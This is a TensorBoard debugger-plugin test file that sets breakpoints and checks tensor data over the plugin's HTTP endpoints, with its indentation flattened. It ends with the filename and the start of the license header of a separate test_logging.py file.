from werkzeug import wrappers # pylint: disable=wrong-import-order
from tensorboard.backend import application
from tensorboard.backend.event_processing import plugin_event_multiplexer as event_multiplexer # pylint: disable=line-too-long
from tensorboard.plugins import base_plugin
from tensorboard.plugins.debugger import interactive_debugger_plugin
_SERVER_URL_PREFIX = '/data/plugin/debugger/'
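# Summary of the debugger backend endpoints exercised by the tests below (derived from
# the tests themselves; all paths are relative to _SERVER_URL_PREFIX):
#   comm?pos=N      poll the Nth comm message (session metadata or tensor data)
#   ack             let the paused Session.run() proceed to the next breakpoint
#   gated_grpc      list/set gated-gRPC breakpoints and retrieve device/tensor names
#   debugger_graph  fetch the partition graph for a given run key and device
#   tensor_data     fetch full or sliced tensor value history by watch key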
class InteractiveDebuggerPluginTest(tf.test.TestCase):
def setUp(self):
super(InteractiveDebuggerPluginTest, self).setUp()
self._dummy_logdir = tempfile.mkdtemp()
self._dummy_multiplexer = event_multiplexer.EventMultiplexer({})
self._debugger_port = portpicker.pick_unused_port()
self._debugger_url = 'grpc://localhost:%d' % self._debugger_port
context = base_plugin.TBContext(logdir=self._dummy_logdir,
multiplexer=self._dummy_multiplexer)
self._debugger_plugin = (
interactive_debugger_plugin.InteractiveDebuggerPlugin(context))
self._debugger_plugin.listen(self._debugger_port)
wsgi_app = application.TensorBoardWSGIApp(
self._dummy_logdir,
[self._debugger_plugin],
self._dummy_multiplexer,
reload_interval=0,
path_prefix='')
self._server = werkzeug_test.Client(wsgi_app, wrappers.BaseResponse)
def tearDown(self):
# In some cases (e.g., an empty test method body), the stop_server() method
# may get called before the server is started, leading to a ValueError.
while True:
try:
self._debugger_plugin._debugger_data_server.stop_server()
break
except ValueError:
pass
shutil.rmtree(self._dummy_logdir, ignore_errors=True)
super(InteractiveDebuggerPluginTest, self).tearDown()
def _serverGet(self, path, params=None, expected_status_code=200):
"""Send the serve a GET request and obtain the response.
Args:
path: URL path (excluding the prefix), without parameters encoded.
params: Query parameters to be encoded in the URL, as a dict.
expected_status_code: Expected status code.
Returns:
Response from server.
"""
url = _SERVER_URL_PREFIX + path
if params:
url += '?' + urllib.parse.urlencode(params)
response = self._server.get(url)
self.assertEqual(expected_status_code, response.status_code)
return response
def _deserializeResponse(self, response):
"""Deserializes byte content that is a JSON encoding.
Args:
response: A response object.
Returns:
The deserialized python object decoded from JSON.
"""
return json.loads(response.get_data().decode("utf-8"))
def _runSimpleAddMultiplyGraph(self, variable_size=1):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable([10.0] * variable_size, name='a')
b = tf.Variable([20.0] * variable_size, name='b')
c = tf.Variable([30.0] * variable_size, name='c')
x = tf.multiply(a, b, name="x")
y = tf.add(x, c, name="y")
sess.run(tf.global_variables_initializer())
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(y))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def _runMultiStepAssignAddGraph(self, steps):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable(10, dtype=tf.int32, name='a')
b = tf.Variable(1, dtype=tf.int32, name='b')
inc_a = tf.assign_add(a, b, name='inc_a')
sess.run(tf.global_variables_initializer())
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
for _ in range(steps):
session_run_results.append(sess.run(inc_a))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def _runTfGroupGraph(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable(10, dtype=tf.int32, name='a')
b = tf.Variable(20, dtype=tf.int32, name='b')
d = tf.constant(1, dtype=tf.int32, name='d')
inc_a = tf.assign_add(a, d, name='inc_a')
inc_b = tf.assign_add(b, d, name='inc_b')
inc_ab = tf.group([inc_a, inc_b], name="inc_ab")
sess.run(tf.global_variables_initializer())
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(inc_ab))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def testCommAndAckWithoutBreakpoints(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
response_data = self._deserializeResponse(comm_response)
self.assertGreater(response_data['timestamp'], 0)
self.assertEqual('meta', response_data['type'])
self.assertEqual({'run_key': ['', 'y:0', '']}, response_data['data'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testGetDeviceNamesAndDebuggerGraph(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
response_data = self._deserializeResponse(comm_response)
run_key = json.dumps(response_data['data']['run_key'])
device_names_response = self._serverGet(
'gated_grpc', {'mode': 'retrieve_device_names', 'run_key': run_key})
device_names_data = self._deserializeResponse(device_names_response)
self.assertEqual(1, len(device_names_data['device_names']))
device_name = device_names_data['device_names'][0]
graph_response = self._serverGet(
'debugger_graph', {'run_key': run_key, 'device_name': device_name})
self.assertTrue(graph_response.get_data())
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testRetrieveAllGatedGrpcTensors(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
response_data = self._deserializeResponse(comm_response)
run_key = json.dumps(response_data['data']['run_key'])
retrieve_all_response = self._serverGet(
'gated_grpc', {'mode': 'retrieve_all', 'run_key': run_key})
retrieve_all_data = self._deserializeResponse(retrieve_all_response)
self.assertTrue(retrieve_all_data['device_names'])
# No breakpoints have been activated.
self.assertEqual([], retrieve_all_data['breakpoints'])
device_name = retrieve_all_data['device_names'][0]
tensor_names = [item[0] for item
in retrieve_all_data['gated_grpc_tensors'][device_name]]
self.assertItemsEqual(
['a', 'a/read', 'b', 'b/read', 'x', 'c', 'c/read', 'y'], tensor_names)
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testActivateOneBreakpoint(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Proceed to breakpoint x:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('float32', comm_data['data']['dtype'])
self.assertEqual([1], comm_data['data']['shape'])
self.assertEqual('x', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose([200.0], comm_data['data']['values'])
# Proceed to the end of the Session.run().
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
# Verify that the activated breakpoint is remembered.
breakpoints_response = self._serverGet(
'gated_grpc', {'mode': 'breakpoints'})
breakpoints_data = self._deserializeResponse(breakpoints_response)
self.assertEqual([['x', 0, 'DebugIdentity']], breakpoints_data)
def testActivateAndDeactivateOneBreakpoint(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Deactivate the breakpoint right away.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'disable'})
# Proceed to the end of the Session.run().
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
# Verify that there is no breakpoint activated.
breakpoints_response = self._serverGet(
'gated_grpc', {'mode': 'breakpoints'})
breakpoints_data = self._deserializeResponse(breakpoints_response)
self.assertEqual([], breakpoints_data)
def testActivateTwoBreakpoints(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Activate breakpoint for y:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'y', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Proceed to breakpoint x:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('float32', comm_data['data']['dtype'])
self.assertEqual([1], comm_data['data']['shape'])
self.assertEqual('x', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose([200.0], comm_data['data']['values'])
# Proceed to breakpoint y:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 3})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('float32', comm_data['data']['dtype'])
self.assertEqual([1], comm_data['data']['shape'])
self.assertEqual('y', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose([230.0], comm_data['data']['values'])
# Proceed to the end of the Session.run().
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
# Verify that the activated breakpoints are remembered.
breakpoints_response = self._serverGet(
'gated_grpc', {'mode': 'breakpoints'})
breakpoints_data = self._deserializeResponse(breakpoints_response)
self.assertItemsEqual(
[['x', 0, 'DebugIdentity'], ['y', 0, 'DebugIdentity']],
breakpoints_data)
def testCommResponseOmitsLargeSizedTensorValues(self):
session_run_thread, session_run_results = (
self._runSimpleAddMultiplyGraph(10))
comm_response = self._serverGet('comm', {'pos': 1})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('meta', comm_data['type'])
self.assertEqual({'run_key': ['', 'y:0', '']}, comm_data['data'])
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Continue to the breakpoint at x:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('float32', comm_data['data']['dtype'])
self.assertEqual([10], comm_data['data']['shape'])
self.assertEqual('x', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
# Verify that the large-sized tensor gets omitted in the comm response.
self.assertEqual(None, comm_data['data']['values'])
# Use the /tensor_data endpoint to obtain the full value of x:0.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'x:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertAllClose([[200.0] * 10], tensor_data['tensor_data'])
# Use the /tensor_data endpoint to obtain the sliced value of x:0.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'x:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': '[:5]'})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertAllClose([[200.0] * 5], tensor_data['tensor_data'])
# Continue to the end.
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0] * 10], session_run_results)
def testMultipleSessionRunsTensorValueFullHistory(self):
session_run_thread, session_run_results = (
self._runMultiStepAssignAddGraph(2))
comm_response = self._serverGet('comm', {'pos': 1})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('meta', comm_data['type'])
self.assertEqual({'run_key': ['', 'inc_a:0', '']}, comm_data['data'])
# Activate breakpoint for inc_a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'inc_a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Continue to inc_a:0 for the 1st time.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('int32', comm_data['data']['dtype'])
self.assertEqual([], comm_data['data']['shape'])
self.assertEqual('inc_a', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose(11.0, comm_data['data']['values'])
# Call /tensor_data to get the full history of the inc_a tensor (so far).
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'inc_a:0:DebugIdentity',
'time_indices': ':',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual({'tensor_data': [11], 'error': None}, tensor_data)
# Continue to the beginning of the 2nd session.run.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 3})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('meta', comm_data['type'])
self.assertEqual({'run_key': ['', 'inc_a:0', '']}, comm_data['data'])
# Continue to inc_a:0 for the 2nd time.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 4})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('int32', comm_data['data']['dtype'])
self.assertEqual([], comm_data['data']['shape'])
self.assertEqual('inc_a', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose(12.0, comm_data['data']['values'])
# Call /tensor_data to get the full history of the inc_a tensor.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'inc_a:0:DebugIdentity',
'time_indices': ':',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual({'tensor_data': [11, 12], 'error': None}, tensor_data)
# Call /tensor_data to get the latest time index of the inc_a tensor.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'inc_a:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual({'tensor_data': [12], 'error': None}, tensor_data)
# Continue to the end.
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([11.0, 12.0], session_run_results)
def testSetBreakpointOnNoTensorOp(self):
session_run_thread, session_run_results = self._runTfGroupGraph()
comm_response = self._serverGet('comm', {'pos': 1})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('meta', comm_data['type'])
self.assertEqual({'run_key': ['', '', 'inc_ab']}, comm_data['data'])
# Activate breakpoint for inc_a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'inc_a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Activate breakpoint for inc_ab.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'inc_ab', 'output_slot': -1,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Continue to inc_a:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('int32', comm_data['data']['dtype'])
self.assertEqual([], comm_data['data']['shape'])
self.assertEqual('inc_a', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose(11.0, comm_data['data']['values'])
# Continue to the end. The breakpoint at inc_ab should not have blocked
# execution, because inc_ab is a tf.group op that produces no output.
self._serverGet('ack')
session_run_thread.join()
self.assertEqual([None], session_run_results)
breakpoints_response = self._serverGet(
'gated_grpc', {'mode': 'breakpoints'})
breakpoints_data = self._deserializeResponse(breakpoints_response)
self.assertItemsEqual(
[['inc_a', 0, 'DebugIdentity'], ['inc_ab', -1, 'DebugIdentity']],
breakpoints_data)
def testCommDataCanBeServedToMultipleClients(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
comm_data_1 = self._deserializeResponse(comm_response)
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Activate breakpoint for y:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'y', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Proceed to breakpoint x:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data_2 = self._deserializeResponse(comm_response)
self.assertGreater(comm_data_2['timestamp'], 0)
self.assertEqual('tensor', comm_data_2['type'])
self.assertEqual('float32', comm_data_2['data']['dtype'])
self.assertEqual([1], comm_data_2['data']['shape'])
self.assertEqual('x', comm_data_2['data']['node_name'])
self.assertEqual(0, comm_data_2['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data_2['data']['debug_op'])
self.assertAllClose([200.0], comm_data_2['data']['values'])
# Proceed to breakpoint y:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 3})
comm_data_3 = self._deserializeResponse(comm_response)
self.assertGreater(comm_data_3['timestamp'], 0)
self.assertEqual('tensor', comm_data_3['type'])
self.assertEqual('float32', comm_data_3['data']['dtype'])
self.assertEqual([1], comm_data_3['data']['shape'])
self.assertEqual('y', comm_data_3['data']['node_name'])
self.assertEqual(0, comm_data_3['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data_3['data']['debug_op'])
self.assertAllClose([230.0], comm_data_3['data']['values'])
# Proceed to the end of the Session.run().
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
# A 2nd client requests the comm data at positions 1, 2 and 3 again.
comm_response = self._serverGet('comm', {'pos': 1})
self.assertEqual(comm_data_1, self._deserializeResponse(comm_response))
comm_response = self._serverGet('comm', {'pos': 2})
self.assertEqual(comm_data_2, self._deserializeResponse(comm_response))
comm_response = self._serverGet('comm', {'pos': 3})
self.assertEqual(comm_data_3, self._deserializeResponse(comm_response))
def testInvalidBreakpointStateLeadsTo400Response(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
# Use an invalid state ('bad_state') when setting a breakpoint state.
response = self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'bad_state'},
expected_status_code=400)
data = self._deserializeResponse(response)
self.assertEqual('Unrecognized new state for x:0:DebugIdentity: bad_state',
data['error'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testInvalidModeArgForGatedGrpcRouteLeadsTo400Response(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
# Use an invalid mode argument ('bad_mode') when calling the 'gated_grpc'
# endpoint.
response = self._serverGet(
'gated_grpc',
{'mode': 'bad_mode', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'},
expected_status_code=400)
data = self._deserializeResponse(response)
self.assertEqual('Unrecognized mode for the gated_grpc route: bad_mode',
data['error'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testDebuggerHostAndGrpcPortEndpoint(self):
response = self._serverGet('debugger_grpc_host_port')
response_data = self._deserializeResponse(response)
self.assertTrue(response_data['host'])
self.assertEqual(self._debugger_port, response_data['port'])
def testGetSourceFilePaths(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
source_paths_response = self._serverGet('source_code', {'mode': 'paths'})
response_data = self._deserializeResponse(source_paths_response)
self.assertIn(__file__, response_data['paths'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testGetSourceFileContentWithValidFilePath(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
file_content_response = self._serverGet(
'source_code', {'mode': 'content', 'file_path': __file__})
response_data = self._deserializeResponse(file_content_response)
# Verify that the content of this file is included.
self.assertTrue(response_data['content'][__file__])
# Verify that, for the lines of the file that create TensorFlow ops, the list
# of op names and their stack positions is included.
op_linenos = collections.defaultdict(set)
for lineno in response_data['lineno_to_op_name_and_stack_pos']:
self.assertGreater(int(lineno), 0)
for op_name, stack_pos in response_data[
'lineno_to_op_name_and_stack_pos'][lineno]:
op_linenos[op_name].add(lineno)
self.assertGreaterEqual(stack_pos, 0)
self.assertTrue(op_linenos['a'])
self.assertTrue(op_linenos['a/Assign'])
self.assertTrue(op_linenos['a/initial_value'])
self.assertTrue(op_linenos['a/read'])
self.assertTrue(op_linenos['b'])
self.assertTrue(op_linenos['b/Assign'])
self.assertTrue(op_linenos['b/initial_value'])
self.assertTrue(op_linenos['b/read'])
self.assertTrue(op_linenos['c'])
self.assertTrue(op_linenos['c/Assign'])
self.assertTrue(op_linenos['c/initial_value'])
self.assertTrue(op_linenos['c/read'])
self.assertTrue(op_linenos['x'])
self.assertTrue(op_linenos['y'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testGetSourceOpTraceback(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
for op_name in ('a', 'b', 'c', 'x', 'y'):
op_traceback_response = self._serverGet(
'source_code', {'mode': 'op_traceback', 'op_name': op_name})
response_data = self._deserializeResponse(op_traceback_response)
found_current_file = False
for file_path, lineno in response_data['op_traceback'][op_name]:
self.assertGreater(lineno, 0)
if file_path == __file__:
found_current_file = True
break
self.assertTrue(found_current_file)
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def _runInitializer(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable([10.0] * 10, name='a')
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
# Run the initializer with a debugger-wrapped tf.Session.
session_run_results.append(sess.run(a.initializer))
session_run_results.append(sess.run(a))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
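# Note: sess.run(a.initializer) returns None, and a:0 is still uninitialized
# when the debugger first intercepts it; the two tests below (the tensor_data
# and comm endpoints for an uninitialized tensor) rely on both facts.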
def testTensorDataForUninitializedTensorIsHandledCorrectly(self):
session_run_thread, session_run_results = self._runInitializer()
# Activate breakpoint for a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
self._serverGet('ack')
self._serverGet('ack')
self._serverGet('ack')
session_run_thread.join()
self.assertEqual(2, len(session_run_results))
self.assertIsNone(session_run_results[0])
self.assertAllClose([10.0] * 10, session_run_results[1])
# Get tensor data without slicing.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'a:0:DebugIdentity',
'time_indices': ':',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertIsNone(tensor_data['error'])
tensor_data = tensor_data['tensor_data']
self.assertEqual(2, len(tensor_data))
self.assertIsNone(tensor_data[0])
self.assertAllClose([10.0] * 10, tensor_data[1])
# Get tensor data with slicing.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'a:0:DebugIdentity',
'time_indices': ':',
'mapping': '',
'slicing': '[:5]'})
tensor_data = self._deserializeResponse(tensor_response)
self.assertIsNone(tensor_data['error'])
tensor_data = tensor_data['tensor_data']
self.assertEqual(2, len(tensor_data))
self.assertIsNone(tensor_data[0])
self.assertAllClose([10.0] * 5, tensor_data[1])
def testCommDataForUninitializedTensorIsHandledCorrectly(self):
session_run_thread, _ = self._runInitializer()
# Activate breakpoint for a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('Uninitialized', comm_data['data']['dtype'])
self.assertEqual('Uninitialized', comm_data['data']['shape'])
self.assertEqual('N/A', comm_data['data']['values'])
self.assertEqual(
'a/(a)', comm_data['data']['maybe_base_expanded_node_name'])
self._serverGet('ack')
self._serverGet('ack')
self._serverGet('ack')
session_run_thread.join()
def _runHealthPillNetwork(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable(
[np.nan, np.inf, np.inf, -np.inf, -np.inf, -np.inf, 10, 20, 30],
dtype=tf.float32, name='a')
session_run_results.append(sess.run(a.initializer))
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(a))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def testHealthPill(self):
session_run_thread, _ = self._runHealthPillNetwork()
# Activate breakpoint for a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
self._serverGet('ack')
session_run_thread.join()
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'a:0:DebugIdentity',
'time_indices': '-1',
'mapping': 'health-pill',
'slicing': ''})
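# With mapping='health-pill', each time index maps to a 12-element numeric
# summary of the tensor instead of its raw values; the individual elements
# are checked one by one below.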
tensor_data = self._deserializeResponse(tensor_response)
self.assertIsNone(tensor_data['error'])
tensor_data = tensor_data['tensor_data'][0]
self.assertAllClose(1.0, tensor_data[0]) # IsInitialized.
self.assertAllClose(9.0, tensor_data[1]) # Total count.
self.assertAllClose(1.0, tensor_data[2]) # NaN count.
self.assertAllClose(3.0, tensor_data[3]) # -Infinity count.
self.assertAllClose(0.0, tensor_data[4]) # Finite negative count.
self.assertAllClose(0.0, tensor_data[5]) # Zero count.
self.assertAllClose(3.0, tensor_data[6]) # Positive count.
self.assertAllClose(2.0, tensor_data[7]) # +Infinity count.
self.assertAllClose(10.0, tensor_data[8]) # Min.
self.assertAllClose(30.0, tensor_data[9]) # Max.
self.assertAllClose(20.0, tensor_data[10]) # Mean.
self.assertAllClose(
np.var([10.0, 20.0, 30.0]), tensor_data[11]) # Variance.
def _runStringNetwork(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
str1 = tf.Variable('abc', name='str1')
str2 = tf.Variable('def', name='str2')
str_concat = tf.add(str1, str2, name='str_concat')
sess.run(tf.global_variables_initializer())
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(str_concat))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def testStringTensorIsHandledCorrectly(self):
session_run_thread, session_run_results = self._runStringNetwork()
# Activate breakpoint for str1:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'str1', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('object', comm_data['data']['dtype'])
self.assertEqual([], comm_data['data']['shape'])
self.assertEqual('abc', comm_data['data']['values'])
self.assertEqual(
'str1/(str1)', comm_data['data']['maybe_base_expanded_node_name'])
session_run_thread.join()
self.assertEqual(1, len(session_run_results))
self.assertEqual(b"abcdef", session_run_results[0])
# Get the value of a tensor without mapping.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'str1:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertEqual(['abc'], tensor_data['tensor_data'])
# Get the health pill of a string tensor: no numeric summary is produced for
# a string tensor, so a None entry is expected.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'str1:0:DebugIdentity',
'time_indices': '-1',
'mapping': 'health-pill',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertEqual([None], tensor_data['tensor_data'])
if __name__ == "__main__":
tf.test.main()
|
test_logging.py
|
# Copyright 2001-2014 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
